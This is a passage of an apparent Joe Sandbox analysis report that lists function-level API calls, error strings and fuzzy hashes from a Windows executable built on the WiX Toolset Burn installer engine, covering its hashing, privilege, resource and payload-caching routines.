                                                                                                                                                                                                                                                                            • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,?,F0000040,?,?,?,?,?,?), ref: 0093A335
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?), ref: 0093A33F
                                                                                                                                                                                                                                                                            • CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?,?,?), ref: 0093A38D
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?), ref: 0093A397
                                                                                                                                                                                                                                                                            • CryptHashData.ADVAPI32(?,?,?,00000000,?,?), ref: 0093A3F2
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,00001000,?,00000000,?,?), ref: 0093A416
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?), ref: 0093A420
                                                                                                                                                                                                                                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 0093A473
                                                                                                                                                                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0093A48A
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?), ref: 0093A4A3
                                                                                                                                                                                                                                                                            • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,?), ref: 0093A4EF
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?), ref: 0093A4F9
                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNEL32(?,00000000,00000000,0000800E,00000001,?,?), ref: 0093A543
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?), ref: 0093A551
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CryptErrorLast$Hash$ContextFile$AcquireCreateDataDestroyParamPointerReadRelease
                                                                                                                                                                                                                                                                            • String ID: Failed to acquire crypto context.$Failed to get file pointer.$Failed to get hash value.$Failed to hash data block.$Failed to initiate hash.$Failed to read data block.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\cryputil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3955742341-696376830
                                                                                                                                                                                                                                                                            • Opcode ID: 0c3d68326c110b19537cd4ade79f7378a10c812257a26f6c5dfe8f0dae929dbf
                                                                                                                                                                                                                                                                            • Instruction ID: 21ffcb544c10a66c9d7ee5ab0df2e3df529404bbf39ca34da9e982168f9846a7
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0c3d68326c110b19537cd4ade79f7378a10c812257a26f6c5dfe8f0dae929dbf
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0161D777D00235ABD7318A588C4DFEE766CBB05755F058065BE88F7191E2B48C809EA2
                                                                                                                                                                                                                                                                            Function 0093B884 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0093B8BC
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0093B8C6
                                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(?,00000020,?), ref: 0093B91A
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0093B924
                                                                                                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(00000000,00000000,00000001,00000010,00000000,00000000), ref: 0093B976
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0093B980
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0093B9C4
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0093B9DD
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$Token$AdjustCloseHandleLookupOpenPrivilegePrivilegesProcessValue
                                                                                                                                                                                                                                                                            • String ID: Failed to adjust token to add privilege: %ls$Failed to get privilege LUID: %ls$Failed to get process token to adjust privileges.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 1766547789-3772314226
                                                                                                                                                                                                                                                                            • Opcode ID: 5d8674b4ff276782d28de2dd946334ea2e2449dfd67050a10ad49cd98862b03b
                                                                                                                                                                                                                                                                            • Instruction ID: 0dd1e1f2df112718b728b7dde932ce6a54f36be7009b7653148ad5cc16c7348c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d8674b4ff276782d28de2dd946334ea2e2449dfd67050a10ad49cd98862b03b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13419476E51229A7E72097559C4EFBFBA6CEF06B58F014119BF04BB280E3748D009BE1
                                                                                                                                                                                                                                                                            Function 0094699C Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 116COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FindResourceExA.KERNEL32(?,0000000A,?,00000000), ref: 009469AD
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0090D16B,?,00000001,?,?), ref: 009469B9
                                                                                                                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000,?,0090D16B,?,00000001,?,?), ref: 00946A06
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0090D16B,?,00000001,?,?), ref: 00946A12
                                                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(?,00000000,?,0090D16B,?,00000001,?,?), ref: 00946A4D
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0090D16B,?,00000001,?,?), ref: 00946A59
                                                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,0090D16B,?,00000001,?,?), ref: 00946A94
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0090D16B,?,00000001,?,?), ref: 00946AA5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLastResource$FindLoadLockSizeof
                                                                                                                                                                                                                                                                            • String ID: Failed to find resource.$Failed to get size of resource.$Failed to load resource.$Failed to lock data resource.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\resrutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2627587518-3856033167
                                                                                                                                                                                                                                                                            • Opcode ID: 45cae30e5fe90a2c8725d585c1acb5c2fde7235e2d4d3e14c6ad3cc6a1fb4aa2
                                                                                                                                                                                                                                                                            • Instruction ID: 9252f082056ef5a16763cbce76f0902171cbfbeb69a8d37237251780f9c37247
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45cae30e5fe90a2c8725d585c1acb5c2fde7235e2d4d3e14c6ad3cc6a1fb4aa2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A23147BB951A3667D7314A558C09F2B6D6CEB47761F028029FE15FB380E6B4CC0096E2
                                                                                                                                                                                                                                                                            Function 008FEA4B Relevance: 21.2, APIs: 1, Strings: 11, Instructions: 222COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\cache.cpp, xrefs: 008FEA91, 008FEAEA, 008FEC97, 008FECBB
                                                                                                                                                                                                                                                                            • Failed to transfer working path to unverified path for payload: %ls., xrefs: 008FEB31
                                                                                                                                                                                                                                                                            • Failed to find payload: %ls in working path: %ls and unverified path: %ls, xrefs: 008FECA9
                                                                                                                                                                                                                                                                            • Aborted transferring working path to unverified path for payload: %ls., xrefs: 008FEB92
                                                                                                                                                                                                                                                                            • Failed to move verified file to complete payload path: %ls, xrefs: 008FEC6A
                                                                                                                                                                                                                                                                            • moving, xrefs: 008FEC25, 008FEC32
                                                                                                                                                                                                                                                                            • Failed to get cached path for package with cache id: %ls, xrefs: 008FEA7F
                                                                                                                                                                                                                                                                            • Failed to reset permissions on unverified cached payload: %ls, xrefs: 008FEBBC
                                                                                                                                                                                                                                                                            • Failed to verify payload: %ls at path: %ls, xrefs: 008FEC0A
                                                                                                                                                                                                                                                                            • Failed to create unverified path., xrefs: 008FEAD8
                                                                                                                                                                                                                                                                            • copying, xrefs: 008FEC2C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Aborted transferring working path to unverified path for payload: %ls.$Failed to create unverified path.$Failed to find payload: %ls in working path: %ls and unverified path: %ls$Failed to get cached path for package with cache id: %ls$Failed to move verified file to complete payload path: %ls$Failed to reset permissions on unverified cached payload: %ls$Failed to transfer working path to unverified path for payload: %ls.$Failed to verify payload: %ls at path: %ls$copying$d:\a\wix4\wix4\src\burn\engine\cache.cpp$moving
                                                                                                                                                                                                                                                                            • API String ID: 0-1123430254
                                                                                                                                                                                                                                                                            • Opcode ID: 91e4871543595b545df2fef8fc8c67533e43600a637ce04629d03bde00ce2083
                                                                                                                                                                                                                                                                            • Instruction ID: 38950aab5635eaf67ae1f1bfe5043b6b2e67bc0a7e3f478037eef4a587c9133b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 91e4871543595b545df2fef8fc8c67533e43600a637ce04629d03bde00ce2083
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18714432680619BBDF229EA58C06FEE7E26FF18B55F110100FF04B51E0D7B19960AB95
                                                                                                                                                                                                                                                                            Function 008FDB8F Relevance: 19.4, APIs: 4, Strings: 7, Instructions: 199fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000), ref: 008FDBAC
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FDBBF
                                                                                                                                                                                                                                                                            • DecryptFileW.ADVAPI32(?,00000000), ref: 008FDD92
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 008FDDA1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$CloseCreateDecryptErrorHandleLast
                                                                                                                                                                                                                                                                            • String ID: Failed to open payload at path: %ls$Failed to verify file size for path: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$Payload has no verification information: %ls$d:\a\wix4\wix4\src\burn\engine\cache.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 3262865546-787582567
                                                                                                                                                                                                                                                                            • Opcode ID: 4a7fc6fc936f28c57211acbfc15ad379d02006c52109919243e83be2a306874d
                                                                                                                                                                                                                                                                            • Instruction ID: 180603f8312aa4838cd0b33572019af23c7e65e293279e2e12946ddec63ce9ce
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a7fc6fc936f28c57211acbfc15ad379d02006c52109919243e83be2a306874d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2751DA3168071ABBDB226E758C0AF7B3A26FF44755F100204BF05E51D0E3A59C60DBE1
                                                                                                                                                                                                                                                                            Function 008FDA0E Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 126fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000), ref: 008FDA2B
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FDA3E
                                                                                                                                                                                                                                                                            • DecryptFileW.ADVAPI32(?,00000000), ref: 008FDB3F
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000001,?,00000000,?,?,?,?), ref: 008FDB4E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$CloseCreateDecryptErrorHandleLast
                                                                                                                                                                                                                                                                            • String ID: Container has no verification information: %ls$Failed to open container at path: %ls$Failed to verify hash of container: %ls$d:\a\wix4\wix4\src\burn\engine\cache.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 3262865546-1706856059
                                                                                                                                                                                                                                                                            • Opcode ID: 71bb5982fc2005673f92dc2a6c7cd6f7d935efc3bbcacb48f708a6650016bc80
                                                                                                                                                                                                                                                                            • Instruction ID: 4bffa7d0af95c9c1c9035b5ffb85f878f7449f1d7b50dc389e228bdff472584b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71bb5982fc2005673f92dc2a6c7cd6f7d935efc3bbcacb48f708a6650016bc80
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95313E35680319BBEB329EB98C4FF7E3A16FF45764F110200FB14BA1D1D3A59860DA95
                                                                                                                                                                                                                                                                            Function 008E94F0 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 138COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to get OS info., xrefs: 008E9544
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008E9662
                                                                                                                                                                                                                                                                            • Failed to set variant value., xrefs: 008E9650
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                                                                                                            • String ID: Failed to get OS info.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3664257935-2618661516
                                                                                                                                                                                                                                                                            • Opcode ID: 5eb46269f3ee4afd4b759b0f01c86db0b12e3b33dda802ab43950031299dad29
                                                                                                                                                                                                                                                                            • Instruction ID: bac8d6d3798d89a1417443333a1a303b690ff512d70f1da0cf6b2562967b7e26
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5eb46269f3ee4afd4b759b0f01c86db0b12e3b33dda802ab43950031299dad29
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B541A5B1A4515CBBDB218B69CC4AFEE7AB8FB5A714F000159F585E6191D2B0DA40CB90
                                                                                                                                                                                                                                                                            Function 0091EC05 Relevance: 13.0, Strings: 10, Instructions: 543COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: BA aborted cache acquire begin.$BA aborted cache acquire resolving.$Failed to compare '%ls' to '%ls'.$Failed to copy payload: %ls$Failed to determine if payload paths were equivalent, source: %ls, destination: %ls.$Failed to download payload: %ls$Failed to extract container for payload: %ls$Failed to resolve source, payload: %ls, package: %ls, container: %ls$Failed to search local source.$d:\a\wix4\wix4\src\burn\engine\apply.cpp
                                                                                                                                                                                                                                                                            • API String ID: 0-1652660176
                                                                                                                                                                                                                                                                            • Opcode ID: 4f71e9186a04a1ad01f946b304b524d93955574a20159db6861d58b249dcf9db
                                                                                                                                                                                                                                                                            • Instruction ID: 0efeaec68b12c2e27027b103636c180a9f0cc242e82a6527a5c80219315085bb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f71e9186a04a1ad01f946b304b524d93955574a20159db6861d58b249dcf9db
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C7224471B0021EEFDB15CF98C981AEEBBB6FF48300F144169E905AB251E771AD91DB90
                                                                                                                                                                                                                                                                            Function 009342FB Relevance: 10.2, APIs: 1, Strings: 4, Instructions: 1473COMMONLIBRARYCODE
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: __floor_pentium4
                                                                                                                                                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                                                                                                                            • API String ID: 4168288129-2761157908
                                                                                                                                                                                                                                                                            • Opcode ID: cb7c634c22bbef44db974bb26047aba889c84df8fc9d64e390d1e6d1681f14f1
                                                                                                                                                                                                                                                                            • Instruction ID: 0f4ce1b06cfb35bd724bbe83438c45e3cc44ea1df7d9eb95d061f0b9418ff69a
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: cb7c634c22bbef44db974bb26047aba889c84df8fc9d64e390d1e6d1681f14f1
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: E9D24871E086298FDB65CE28DD407EAB7B9FB88305F1545EAD40DE7240E778AE818F41
                                                                                                                                                                                                                                                                            Function 008FE72A Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 118fileCOMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,?,?,*.*,?,?,?,.unverified,?), ref: 008FE7D8
                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010,?,?,*.*,?,?,?,.unverified,?), ref: 008FE871
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,?,*.*,?,?,?,.unverified,?), ref: 008FE880
                                                                                                                                                                                                                                                                              • Part of subcall function 008E5C81: GetFileAttributesW.KERNELBASE(?,?,?,?,?,00000000,00000001), ref: 008E5CE9
                                                                                                                                                                                                                                                                              • Part of subcall function 008E5C81: GetLastError.KERNEL32(?,?,?,?,00000000,00000001), ref: 008E5CF4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileFind$AttributesCloseErrorFirstLastNext
                                                                                                                                                                                                                                                                            • String ID: *.*$.unverified
                                                                                                                                                                                                                                                                            • API String ID: 3458812364-2528915496
                                                                                                                                                                                                                                                                            • Opcode ID: e0ffb4bbd3bddfe35868cb224f160acc4f6ddbdf8b049eccd26e0baf843480ce
                                                                                                                                                                                                                                                                            • Instruction ID: 278cdf6b4f1e72fb2b780bb26f0b06ae56439b0b3b4ed79498d7bdd1b58c0f12
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: e0ffb4bbd3bddfe35868cb224f160acc4f6ddbdf8b049eccd26e0baf843480ce
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 64419A71A1026DAADB20BF65DC49BFE77B8FF44745F1001A5FA08E60B0E6709E84DB50
                                                                                                                                                                                                                                                                            Function 008E9360 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 67COMMON
                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
